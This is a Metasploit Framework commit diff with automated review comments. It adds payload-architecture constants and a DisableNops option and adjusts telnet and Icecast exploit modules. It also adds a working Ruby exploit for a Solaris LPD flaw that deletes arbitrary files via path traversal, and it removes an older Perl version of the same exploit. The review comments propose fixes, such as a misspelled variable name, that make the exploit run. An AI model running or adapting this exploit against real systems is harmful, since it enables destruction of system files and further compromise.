Miscellaneous fixes, changes to CMD payloads
git-svn-id: file:///home/svn/incoming/trunk@3296 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
09d21fbced
commit
9fc93bbe56
|
@ -51,6 +51,11 @@ module Exploit
|
||||||
# job.
|
# job.
|
||||||
#
|
#
|
||||||
def self.exploit_simple(exploit, opts)
|
def self.exploit_simple(exploit, opts)
|
||||||
|
|
||||||
|
p exploit.methods.sort
|
||||||
|
p exploit.payload?
|
||||||
|
p exploit.payload_info
|
||||||
|
|
||||||
# Make sure parameters are valid.
|
# Make sure parameters are valid.
|
||||||
if (opts['Payload'] == nil)
|
if (opts['Payload'] == nil)
|
||||||
raise MissingPayloadError,
|
raise MissingPayloadError,
|
||||||
|
|
|
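Review bot: The three `p` calls added at the start of `exploit_simple` (`p exploit.methods.sort`, `p exploit.payload?`, `p exploit.payload_info`) look like leftover debugging output; they dump the module's full method list and payload metadata to stdout on every call, which will spam any console or scripted driver that uses this helper. They should be dropped before this lands, or at least routed through the framework's logging at a debug level so they are not unconditional. The body of `exploit_simple` continues outside the hunk.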
@ -110,6 +110,8 @@ class EncodedPayload
|
||||||
|
|
||||||
# Get the minimum number of nops to use
|
# Get the minimum number of nops to use
|
||||||
min = (reqs['MinNops'] || 0).to_i
|
min = (reqs['MinNops'] || 0).to_i
|
||||||
|
min = 0 if reqs['DisableNops']
|
||||||
|
|
||||||
|
|
||||||
# Check to see if we have enough room for the minimum requirements
|
# Check to see if we have enough room for the minimum requirements
|
||||||
if ((reqs['Space']) and
|
if ((reqs['Space']) and
|
||||||
|
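Review bot: `min = 0 if reqs['DisableNops']` silently overrides an explicit `MinNops`, and the same flag is handled again in the second `EncodedPayload` hunk (`self.nop_sled_size = 0 if reqs['DisableNops']`), so the precedence rule now lives in two places with no comment stating it. A one-line comment at each site, e.g. `# DisableNops takes precedence over MinNops/MaxNops: no sled is generated`, would make the intent explicit; alternatively, test the flag once and skip both the minimum computation and the sled construction from that single guard. Note that `reqs['DisableNops']` is checked for plain Ruby truthiness, so a string such as `'false'` would also disable nops — fine if the key is only ever set to a boolean literal by module authors, as the other hunks in this commit do, but worth stating. The enclosing method starts and ends outside the hunk.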
@ -164,6 +166,9 @@ class EncodedPayload
|
||||||
self.nop_sled_size = reqs['MaxNops']
|
self.nop_sled_size = reqs['MaxNops']
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Check for the DisableNops setting
|
||||||
|
self.nop_sled_size = 0 if reqs['DisableNops']
|
||||||
|
|
||||||
# Now construct the actual sled
|
# Now construct the actual sled
|
||||||
if (self.nop_sled_size > 0)
|
if (self.nop_sled_size > 0)
|
||||||
pinst.compatible_nops.each { |nopname, nopmod|
|
pinst.compatible_nops.each { |nopname, nopmod|
|
||||||
|
|
|
@ -68,23 +68,14 @@ ARCH_X86 = 'x86'
|
||||||
ARCH_MIPS = 'mips'
|
ARCH_MIPS = 'mips'
|
||||||
ARCH_PPC = 'ppc'
|
ARCH_PPC = 'ppc'
|
||||||
ARCH_SPARC = 'sparc'
|
ARCH_SPARC = 'sparc'
|
||||||
|
ARCH_CMD = 'cmd'
|
||||||
ARCH_TYPES =
|
ARCH_TYPES =
|
||||||
[
|
[
|
||||||
ARCH_X86,
|
ARCH_X86,
|
||||||
ARCH_MIPS,
|
ARCH_MIPS,
|
||||||
ARCH_PPC,
|
ARCH_PPC,
|
||||||
ARCH_SPARC
|
ARCH_SPARC,
|
||||||
|
ARCH_CMD,
|
||||||
]
|
]
|
||||||
|
|
||||||
|
ARCH_ALL = ARCH_TYPES
|
||||||
ARCH_CMD_UNIX = 'cmd_unix'
|
|
||||||
ARCH_CMD_LINUX = 'cmd_linux'
|
|
||||||
ARCH_CMD_BSD = 'cmd_bsd'
|
|
||||||
ARCH_CMD =
|
|
||||||
[
|
|
||||||
ARCH_CMD_UNIX,
|
|
||||||
ARCH_CMD_LINUX,
|
|
||||||
ARCH_CMD_BSD
|
|
||||||
]
|
|
||||||
|
|
||||||
ARCH_ALL = ARCH_TYPES + ARCH_CMD
|
|
||||||
|
|
|
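Review bot: `ARCH_ALL = ARCH_TYPES` binds both constants to the same unfrozen array object, whereas the removed `ARCH_TYPES + ARCH_CMD` produced a fresh array; any later `ARCH_ALL << x` or `ARCH_TYPES.push` will silently change the other list. Freezing the literal closes that off: end the `ARCH_TYPES` definition with `].freeze`, or use `ARCH_ALL = ARCH_TYPES.dup` if the two lists are meant to diverge later. Also note that `ARCH_CMD` changes from an Array of three names to the String `'cmd'`, so any caller that iterated over it or compared against `ARCH_CMD_UNIX` will need updating; the telnet module hunk in this commit only passes it through as `'Arch' => ARCH_CMD`.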
@ -0,0 +1,102 @@
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
|
||||||
|
class Exploits::Solaris::Lpd::CascadeDelete < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
include Exploit::Remote::Tcp
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Solaris LPD Arbitrary File Delete',
|
||||||
|
'Description' => %q{
|
||||||
|
This module uses a vulnerability in the Solaris line printer
|
||||||
|
daemon to delete arbitrary files on an affected system. This
|
||||||
|
can be used to exploit the rpc.walld format string flaw, the
|
||||||
|
missing krb5.conf authentication bypass, or simply delete
|
||||||
|
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
|
||||||
|
|
||||||
|
},
|
||||||
|
'Author' => [ 'hdm', 'Optyx <optyx@uberhax0r.net>' ],
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
|
||||||
|
],
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
['Automatic Target', { }]
|
||||||
|
],
|
||||||
|
'DisclosureDate' => '',
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(515),
|
||||||
|
OptString.new('RPATH', [ true, "The remote file path to delete"]),
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
|
||||||
|
# Create a simple control file...
|
||||||
|
control = "Hmetasploit\nPr00t\n";
|
||||||
|
|
||||||
|
# The job ID is squashed down to three decimal digits
|
||||||
|
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
|
||||||
|
|
||||||
|
# Establish the first connection to the server
|
||||||
|
sock1 = connect(false)
|
||||||
|
|
||||||
|
# Request a cascaded job
|
||||||
|
sock1.put("\x02metasploit:framework\n")
|
||||||
|
res = sock1.get_once
|
||||||
|
if (not res)
|
||||||
|
print_status("The target did not accept our job request command")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
# Theoretically, we could delete multiple files at once, however
|
||||||
|
# the lp daemon will append garbage from memory to the path name
|
||||||
|
# if we don't stick a null byte after the path. Unfortunately, this
|
||||||
|
# null byte will prevent the parser from processing the other paths.
|
||||||
|
control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"
|
||||||
|
|
||||||
|
dataf = "http://metasploit.com/\n"
|
||||||
|
|
||||||
|
print_status("Deleting #{datstore['RPATH']}...")
|
||||||
|
if (not (
|
||||||
|
send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
|
||||||
|
send_file(sock1, 3, "dfa" + jid + "metasploit", dataf)
|
||||||
|
) )
|
||||||
|
sock1.close
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("Successfully deleted #{datastore['RPATH']} >:-]")
|
||||||
|
sock1.close
|
||||||
|
end
|
||||||
|
|
||||||
|
def send_file (s, type, name, data='')
|
||||||
|
|
||||||
|
s.put(type.chr + data.length.to_s + " " + name + "\n")
|
||||||
|
res = s.get_once(1)
|
||||||
|
if (not (res and res[0] == 0))
|
||||||
|
print_status("The target did not accept our control file command (#{name})")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
s.put(data)
|
||||||
|
s.put("\x00")
|
||||||
|
res = s.get_once(1)
|
||||||
|
if (not (res and res[0] == 0))
|
||||||
|
print_status("The target did not accept our control file data (#{name})")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
|
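Review bot: `print_status("Deleting #{datstore['RPATH']}...")` in `exploit` misspells `datastore`, which raises `NameError` on every run before any control file is sent; it should read `print_status("Deleting #{datastore['RPATH']}...")`. The early-return branch after `res = sock1.get_once` also leaves `sock1` open (`return` without `sock1.close`), unlike the later failure path; add `sock1.close` before that `return`. Finally, `res[0] == 0` in `send_file` depends on `String#[]` returning an Integer, which holds for Ruby 1.8 but not for 1.9 and later where it returns a one-character String and the comparison is always false — `res[0,1] == "\x00"` or `res.unpack('C')[0] == 0` would be version-independent.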
@ -1,198 +0,0 @@
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
module Msf
|
|
||||||
|
|
||||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
|
||||||
|
|
||||||
include Exploit::Remote::Tcp
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Solaris LPD Arbitrary File Delete',
|
|
||||||
'Description' => %q{
|
|
||||||
This module uses a vulnerability in the Solaris line printer
|
|
||||||
daemon to delete arbitrary files on an affected system. This
|
|
||||||
can be used to exploit the rpc.walld format string flaw, the
|
|
||||||
missing krb5.conf authentication bypass, or simple delete
|
|
||||||
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
|
|
||||||
|
|
||||||
},
|
|
||||||
'Author' => [ 'hdm', 'Optyx <optyx@uberhax0r.net>' ],
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
|
|
||||||
|
|
||||||
],
|
|
||||||
'Privileged' => true,
|
|
||||||
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
[
|
|
||||||
'Automatic Targetting',
|
|
||||||
{
|
|
||||||
'Platform' => 'solaris',
|
|
||||||
'Ret' => 0x0,
|
|
||||||
},
|
|
||||||
],
|
|
||||||
],
|
|
||||||
'DisclosureDate' => '',
|
|
||||||
'DefaultTarget' => 0))
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
connect
|
|
||||||
|
|
||||||
handler
|
|
||||||
disconnect
|
|
||||||
end
|
|
||||||
|
|
||||||
=begin
|
|
||||||
|
|
||||||
##
|
|
||||||
# This file is part of the Metasploit Framework and may be redistributed
|
|
||||||
# according to the licenses defined in the Authors field below. In the
|
|
||||||
# case of an unknown or missing license, this file defaults to the same
|
|
||||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
|
||||||
# version of the Framework can always be obtained from metasploit.com.
|
|
||||||
##
|
|
||||||
|
|
||||||
package Msf::Exploit::solaris_lpd_unlink;
|
|
||||||
use base "Msf::Exploit";
|
|
||||||
use IO::Socket;
|
|
||||||
use IO::Select;
|
|
||||||
use strict;
|
|
||||||
use Pex::Text;
|
|
||||||
|
|
||||||
my $advanced = { };
|
|
||||||
|
|
||||||
my $info =
|
|
||||||
{
|
|
||||||
'Name' => 'Solaris LPD Arbitrary File Delete',
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'Authors' =>
|
|
||||||
[
|
|
||||||
'H D Moore <hdm [at] metasploit.com>',
|
|
||||||
'Optyx <optyx [at] uberhax0r.net>'
|
|
||||||
],
|
|
||||||
|
|
||||||
'Arch' => [ ],
|
|
||||||
'OS' => [ 'solaris' ],
|
|
||||||
|
|
||||||
'UserOpts' =>
|
|
||||||
{
|
|
||||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
|
||||||
'RPORT' => [1, 'PORT', 'The LPD server port', 515],
|
|
||||||
'RPATH' => [1, 'DATA', 'The remote path name to delete'],
|
|
||||||
},
|
|
||||||
|
|
||||||
'Description' => Pex::Text::Freeform(qq{
|
|
||||||
This module uses a vulnerability in the Solaris line printer daemon
|
|
||||||
to delete arbitrary files on an affected system. This can be used to exploit
|
|
||||||
the rpc.walld format string flaw, the missing krb5.conf authentication bypass,
|
|
||||||
or simple delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
|
|
||||||
}),
|
|
||||||
|
|
||||||
'Refs' =>
|
|
||||||
[
|
|
||||||
['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
|
|
||||||
],
|
|
||||||
|
|
||||||
'DefaultTarget' => 0,
|
|
||||||
'Targets' => [['No Target Needed']],
|
|
||||||
|
|
||||||
'Keys' => ['lpd'],
|
|
||||||
};
|
|
||||||
|
|
||||||
sub new {
|
|
||||||
my $class = shift;
|
|
||||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
|
||||||
return($self);
|
|
||||||
}
|
|
||||||
|
|
||||||
sub Exploit {
|
|
||||||
my $self = shift;
|
|
||||||
my $target_host = $self->GetVar('RHOST');
|
|
||||||
my $target_port = $self->GetVar('RPORT');
|
|
||||||
my $target_path = $self->GetVar('RPATH');
|
|
||||||
my $res;
|
|
||||||
|
|
||||||
# We use one connection to configure the spool directory
|
|
||||||
my $s = Msf::Socket::Tcp->new
|
|
||||||
(
|
|
||||||
'PeerAddr' => $target_host,
|
|
||||||
'PeerPort' => $target_port,
|
|
||||||
'LocalPort' => $self->GetVar('CPORT'),
|
|
||||||
'SSL' => $self->GetVar('SSL'),
|
|
||||||
);
|
|
||||||
if ($s->IsError) {
|
|
||||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
# Send a job request that will trigger the cascade adaptor (thanks Dino!)
|
|
||||||
$s->Send("\x02"."metasploit:framework\n");
|
|
||||||
$res = $s->Recv(1, 5);
|
|
||||||
if (ord($res) != 0) {
|
|
||||||
$self->PrintLine("[*] The target did not accept our job request command");
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
# The job ID is squashed down to three decimal digits
|
|
||||||
my $jid = ($$ % 1000).unpack("H*",pack('N', time() + $$));
|
|
||||||
|
|
||||||
# Create a simple control file...
|
|
||||||
my $control = "Hmetasploit\nPr00t\n";
|
|
||||||
|
|
||||||
# Theoretically, we could delete multiple files at once, however
|
|
||||||
# the lp daemon will append garbage from memory to the path name
|
|
||||||
# if we don't stick a null byte after the path. Unfortunately, this
|
|
||||||
# null byte will prevent the parser from processing the other paths.
|
|
||||||
$control .= "U".("../" x 10)."$target_path\x00\n";
|
|
||||||
|
|
||||||
my $dataf = "http://metasploit.com/\n";
|
|
||||||
|
|
||||||
$self->PrintLine("[*] Sending the malicious cascaded job request...");
|
|
||||||
if ( ! $self->SendFile($s, 2, "cfA".$jid."metasploit", $control) ||
|
|
||||||
! $self->SendFile($s, 3, "dfa".$jid."metasploit", $dataf) ||
|
|
||||||
0
|
|
||||||
) { $s->Close; return }
|
|
||||||
|
|
||||||
$self->PrintLine('');
|
|
||||||
$self->PrintLine("[*] Successfully deleted $target_path >:-]");
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
sub SendFile {
|
|
||||||
my $self = shift;
|
|
||||||
my $sock = shift;
|
|
||||||
my $type = shift;
|
|
||||||
my $name = shift;
|
|
||||||
my $data = shift;
|
|
||||||
|
|
||||||
$sock->Send(chr($type) .length($data). " $name\n");
|
|
||||||
my $res = $sock->Recv(1, 5);
|
|
||||||
if (ord($res) != 0) {
|
|
||||||
$self->PrintLine("[*] The target did not accept our control file command ($name)");
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
$sock->Send($data);
|
|
||||||
$sock->Send("\x00");
|
|
||||||
$res = $sock->Recv(1, 5);
|
|
||||||
if (ord($res) != 0) {
|
|
||||||
$self->PrintLine("[*] The target did not accept our control file data ($name)");
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
$self->PrintLine(sprintf("[*] Uploaded %.4d bytes >> $name", length($data)));
|
|
||||||
return 1;
|
|
||||||
}
|
|
||||||
|
|
||||||
1;
|
|
||||||
|
|
||||||
=end
|
|
||||||
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -23,14 +23,13 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
|
||||||
|
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'Platform' => 'unix',
|
'Platform' => ['unix', 'solaris'],
|
||||||
'Arch' => ARCH_CMD,
|
'Arch' => ARCH_CMD,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'Space' => 2000,
|
'Space' => 2000,
|
||||||
'BadChars' => "",
|
'BadChars' => '',
|
||||||
'MinNops' => 0,
|
'DisableNops' => true,
|
||||||
'MaxNops' => 0,
|
|
||||||
},
|
},
|
||||||
'PayloadCompat' =>
|
'PayloadCompat' =>
|
||||||
{
|
{
|
||||||
|
|
|
@ -45,9 +45,7 @@ class Exploits::Windows::Http::Icecast_Header_Overflow < Msf::Exploit::Remote
|
||||||
{
|
{
|
||||||
'Space' => 2000,
|
'Space' => 2000,
|
||||||
'BadChars' => "\x0d\x0a\x00",
|
'BadChars' => "\x0d\x0a\x00",
|
||||||
'MinNops' => 0,
|
'DisableNops' => true,
|
||||||
'MaxNops' => 0,
|
|
||||||
|
|
||||||
},
|
},
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
|
|